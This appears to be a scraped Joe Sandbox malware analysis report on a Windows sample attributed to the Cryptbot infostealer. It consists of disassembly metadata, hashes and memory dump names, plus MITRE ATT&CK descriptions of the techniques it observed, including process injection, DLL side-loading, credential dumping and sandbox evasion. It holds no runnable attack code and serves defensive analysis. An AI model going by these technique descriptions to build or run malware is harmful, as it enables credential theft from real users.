Instruction Fuzzy Hash: 774117B2B05615CBDB54DF18C480B86B7E5AF89708B29C299DC888F74AD336DC46CF91

Function 6C384DD0 Relevance: 5.4, APIs: 4, Instructions: 352stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C384E0A
strlen.MSVCRT ref: 6C384E8D
strlen.MSVCRT ref: 6C384F10
strlen.MSVCRT ref: 6C384F93

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: ddaac2cf60e9309c8231e41c1205a6e67f043588c31baaf5ac1a3a5ef6207ea5
Instruction ID: ae8deacf7d112f994797030a1098bba0ce7e3fe292d2ce8ab3e5f1c54ec67f65
Opcode Fuzzy Hash: ddaac2cf60e9309c8231e41c1205a6e67f043588c31baaf5ac1a3a5ef6207ea5
Instruction Fuzzy Hash: 5AE137B4A056058FCB04DF6CC1849AEFBF1BF44314B108A69E896CBB54E735E905CF92

Function 6C3845D0 Relevance: 5.4, APIs: 4, Instructions: 352stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C38460A
strlen.MSVCRT ref: 6C38468D
strlen.MSVCRT ref: 6C384710
strlen.MSVCRT ref: 6C384793

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: f6d197081ffe822ae460ef6483d291d6e5d391850a376c4cb69bf762940fe32f
Instruction ID: 184d36bd52e2cc754b3aa078b6261b91ae9db57b0938cfcd6209a52666ce07b0
Opcode Fuzzy Hash: f6d197081ffe822ae460ef6483d291d6e5d391850a376c4cb69bf762940fe32f
Instruction Fuzzy Hash: 40E16574A066058FCB00DF6CC1D09AEFBF5AF89314B108A69E895CBB54E735E905CF82

Function 6C30E1F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89stringCOMMON

Download Yara Rule

APIs

strerror.MSVCRT ref: 6C30E1FE
strlen.MSVCRT ref: 6C30E211

Strings

basic_string: construction from null is not valid, xrefs: 6C30E233

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: strerrorstrlen
String ID: basic_string: construction from null is not valid
API String ID: 960536887-2991274800
Opcode ID: ffcbf3c325891a186c8ea0e95b953bfae5e39d90a0ce297ff0aef0b89a259141
Instruction ID: 931d25fe766cf6451ab521a4fa1a16c6c249fe81b33512aba5fd37c0cfc3f4cf
Opcode Fuzzy Hash: ffcbf3c325891a186c8ea0e95b953bfae5e39d90a0ce297ff0aef0b89a259141
Instruction Fuzzy Hash: 86111273B493008F8701FF7DC88645ABBF5AB89214F85CA69D8D887709E635D4198FA3

Function 00C12F46 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 00C12E97
fputc.MSVCRT ref: 00C12F07
memset.MSVCRT ref: 00C12FC2

Strings

o, xrefs: 00C12F5E

Memory Dump Source

Source File: 00000005.00000002.2931183608.0000000000C11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000005.00000002.2931163525.0000000000C10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931201942.0000000000C1A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931219875.0000000000C1E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931236780.0000000000C21000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c10000_service123.jbxd

Similarity

API ID: fputc$memset
String ID: o
API String ID: 2944404495-252678980
Opcode ID: d1991d27a04d65bd7075c62f110e734cf744bc34d9a2ff6285541d999189f403
Instruction ID: 6d0d7bea07fcc21fa57f917df5cade70204b1a18c0f09cd770b70ab7eb1394e8
Opcode Fuzzy Hash: d1991d27a04d65bd7075c62f110e734cf744bc34d9a2ff6285541d999189f403
Instruction Fuzzy Hash: C9316A79904209CFCB10CF68C1847DABBF1BF4A351F158619D999AB701E734EE95EB80

Function 6C303616 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 6C303567
fputc.MSVCRT ref: 6C3035D7
memset.MSVCRT ref: 6C303692

Strings

o, xrefs: 6C30362E

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: fputc$memset
String ID: o
API String ID: 2944404495-252678980
Opcode ID: 70f9009819c30ed6982fd80218ea7a036d91aa79bbb5e6e144e921cc07d2ecdd
Instruction ID: be5dc722e254f5f45e1d5c2e89d55ae16f1e643fa6ed8bac1ed4e32199c53c8e
Opcode Fuzzy Hash: 70f9009819c30ed6982fd80218ea7a036d91aa79bbb5e6e144e921cc07d2ecdd
Instruction Fuzzy Hash: A3316872A08705CFCB40CF68C180B99BBF1BF49354F158A59D989ABB51E735E905CF50

Function 00C13424 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 00C1338F
fputc.MSVCRT ref: 00C133F1

Strings

@, xrefs: 00C1342A

Memory Dump Source

Source File: 00000005.00000002.2931183608.0000000000C11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000005.00000002.2931163525.0000000000C10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931201942.0000000000C1A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931219875.0000000000C1E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931236780.0000000000C21000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c10000_service123.jbxd

Similarity

API ID: fputc
String ID: @
API String ID: 1992160199-2766056989
Opcode ID: 0837171a8a86bca28f46350b1f324809a3657fdd6de56afd08bfd6ae8b32df6d
Instruction ID: 7b5ed0907730b8de1f73e6179c0d46abd01c38b7ce8c8a9216fda9df67a77a8d
Opcode Fuzzy Hash: 0837171a8a86bca28f46350b1f324809a3657fdd6de56afd08bfd6ae8b32df6d
Instruction Fuzzy Hash: 45117FB1A04240CBCB14CF18C1847D97BE1BF4A308F658148DDA99F35ADB34EE82EB58

Function 6C303AF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 6C303A5F
fputc.MSVCRT ref: 6C303AC1

Strings

@, xrefs: 6C303AFA

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: fputc
String ID: @
API String ID: 1992160199-2766056989
Opcode ID: 4ceeb5be7b06ab83894e5669f94d5ac76a8e9207d24777a966ec28ddf3749335
Instruction ID: 24bd4a84b592704a786a0bea0bc8c5d5963b8c3250e8459d81013f699ba13731
Opcode Fuzzy Hash: 4ceeb5be7b06ab83894e5669f94d5ac76a8e9207d24777a966ec28ddf3749335
Instruction Fuzzy Hash: 6611D7B2B092108BCB40CF28C581B997BB5BF89308F258659ED996FB4AD335E801CF55

Function 00C118B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00C1191E

Strings

Unknown error, xrefs: 00C118B2
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00C118FF

Memory Dump Source

Source File: 00000005.00000002.2931183608.0000000000C11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000005.00000002.2931163525.0000000000C10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931201942.0000000000C1A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931219875.0000000000C1E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931236780.0000000000C21000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c10000_service123.jbxd

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: 017d2c3c81e6aeff720ca8e1c9c0b77c47a6d4c98ec8b10e29a0fb9ac63d8381
Instruction ID: 1467f8d8326f90cd6642b7cb6b6ab1c77a5d1fa3e0a422f3d7641f63e0681e34
Opcode Fuzzy Hash: 017d2c3c81e6aeff720ca8e1c9c0b77c47a6d4c98ec8b10e29a0fb9ac63d8381
Instruction Fuzzy Hash: B201C0B0408B45DBD700AF15E48846ABFF1FF8A350F868898E5C846269CB3299A8D743

Function 6C3177B1 Relevance: 5.1, APIs: 4, Instructions: 128stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C3177D3

Part of subcall function 6C364050: memcpy.MSVCRT(?,?,?,?,-00000001,?,?,6C3177E6), ref: 6C3640B3

strlen.MSVCRT ref: 6C317844
strlen.MSVCRT ref: 6C3178B2
strlen.MSVCRT ref: 6C317926

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: strlen$memcpy
String ID:
API String ID: 3396830738-0
Opcode ID: 81a2c9d08f384c6363d2cda8f1f0db16ae1a4ba7b0c36966bec5593446808c08
Instruction ID: fc35921bd522b7a76db56d184cc1b8dbcdebb1d8d120771260e32cf087f1ea98
Opcode Fuzzy Hash: 81a2c9d08f384c6363d2cda8f1f0db16ae1a4ba7b0c36966bec5593446808c08
Instruction Fuzzy Hash: AA5117B5A09A108FCB04EF29C09865DFBF5BF46304F0585ADD8955FB65CB35A809CF82

Function 00C16B60 Relevance: 5.1, APIs: 4, Instructions: 53sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,?,?,00C16C81,?,?,?,?,?,?,00000000,00C14F24), ref: 00C16B87
InitializeCriticalSection.KERNEL32(?,?,?,?,00C16C81,?,?,?,?,?,?,00000000,00C14F24), ref: 00C16BC4
InitializeCriticalSection.KERNEL32(?,?,?,?,?,00C16C81,?,?,?,?,?,?,00000000,00C14F24), ref: 00C16BD0
EnterCriticalSection.KERNEL32(?,?,?,?,00C16C81,?,?,?,?,?,?,00000000,00C14F24), ref: 00C16BF8

Memory Dump Source

Source File: 00000005.00000002.2931183608.0000000000C11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000005.00000002.2931163525.0000000000C10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931201942.0000000000C1A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931219875.0000000000C1E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931236780.0000000000C21000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c10000_service123.jbxd

Similarity

API ID: CriticalSection$Initialize$EnterSleep
String ID:
API String ID: 1117354567-0
Opcode ID: 2ee770d669c0846050595636d93ae9e7017e7271d5739164d7de768c06026e9a
Instruction ID: c6753b9d24260c83f6a0bc8015c5f35369c4380208efcaea26c8473bc18814d3
Opcode Fuzzy Hash: 2ee770d669c0846050595636d93ae9e7017e7271d5739164d7de768c06026e9a
Instruction Fuzzy Hash: 9711F7B150C1008BDB10FB28A9857EE76A4BB03300F554929D883C7215E775E9D4F796

Function 6C308080 Relevance: 5.1, APIs: 4, Instructions: 53sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,00000002,?,6C3081A1), ref: 6C3080A7
InitializeCriticalSection.KERNEL32(?,?,00000002,?,6C3081A1), ref: 6C3080E4
InitializeCriticalSection.KERNEL32(?,?,?,00000002,?,6C3081A1), ref: 6C3080F0
EnterCriticalSection.KERNEL32(?,?,00000002,?,6C3081A1), ref: 6C308118

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: CriticalSection$Initialize$EnterSleep
String ID:
API String ID: 1117354567-0
Opcode ID: bea7a6681136e6158ea01d34abbb604c55ef741b474181ecf4e31a788cb6b487
Instruction ID: ef0f876afbad5abe85b0fa18dd86769caa9a0a9bd7b1a5d68cb4a7acc35b5d19
Opcode Fuzzy Hash: bea7a6681136e6158ea01d34abbb604c55ef741b474181ecf4e31a788cb6b487
Instruction Fuzzy Hash: E01112B274A1048ADB00FB28D4876A97BF4AB16318F510926D582C7E01D772E584CF93

Function 00C12000 Relevance: 5.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00C121D3,?,?,?,?,?,00C117E8), ref: 00C1200E
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00C121D3,?,?,?,?,?,00C117E8), ref: 00C12035
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00C121D3,?,?,?,?,?,00C117E8), ref: 00C1203C
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,00C121D3,?,?,?,?,?,00C117E8), ref: 00C1205C

Memory Dump Source

Source File: 00000005.00000002.2931183608.0000000000C11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000005.00000002.2931163525.0000000000C10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931201942.0000000000C1A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931219875.0000000000C1E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931236780.0000000000C21000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c10000_service123.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveValue
String ID:
API String ID: 682475483-0
Opcode ID: bf5fec4d640e11d03223c13dc8d004a03fe04e88f004331ae67862a9db791a0a
Instruction ID: 73a105ca296eaba089e94fb9018c9fa5ed534d2f1dfb20d82ea5dfa9ce9c57c1
Opcode Fuzzy Hash: bf5fec4d640e11d03223c13dc8d004a03fe04e88f004331ae67862a9db791a0a
Instruction Fuzzy Hash: 8AF0A4BA9003109FDB10BF78E88479EBBA4FA4A340F058528DD5987215D731ED96CBA2

Function 6C2FAB50 Relevance: 5.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 6C2FAB5E
TlsGetValue.KERNEL32 ref: 6C2FAB85
GetLastError.KERNEL32 ref: 6C2FAB8C
LeaveCriticalSection.KERNEL32 ref: 6C2FABAC

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveValue
String ID:
API String ID: 682475483-0
Opcode ID: 036b3da2b948e2c2237045032dc9c284846318a7f576fc9cd3839de4affb7b91
Instruction ID: f7390009fec69ef882faa6a6ee9555134b0c24860f9a577886f2197dbb8b68af
Opcode Fuzzy Hash: 036b3da2b948e2c2237045032dc9c284846318a7f576fc9cd3839de4affb7b91
Instruction Fuzzy Hash: 2BF0C8B2A0431ACFDB00FF79D4C692ABB74EA55264F060668ED9447B04D631E549CBA3

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Cryptbot

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

